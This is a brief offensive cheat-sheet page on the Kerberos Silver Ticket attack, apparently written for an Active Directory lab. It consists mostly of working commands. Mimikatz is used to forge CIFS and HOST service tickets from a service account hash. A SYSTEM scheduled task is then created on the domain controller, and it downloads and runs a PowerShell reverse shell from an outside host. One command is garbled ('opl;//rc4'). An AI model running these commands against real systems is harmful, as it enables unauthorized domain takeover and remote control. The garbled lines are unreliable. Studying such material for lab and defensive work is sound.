Silver Ticket

Silver Ticket Attack

rc4 = NTLM of service account sid = sid of the domain

//For Cifs
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'

//For host
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST opl;//rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'



//Schedule and execute a task
// Also modify the Invoke-PowerShellTcp.ps1 
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local/SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'"


schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"


iwr -UseDefaultCredentials http://web04

PreviousAbusing Set SPN ACL To Kerberoasting NextDC Sync

Last updated 1 year ago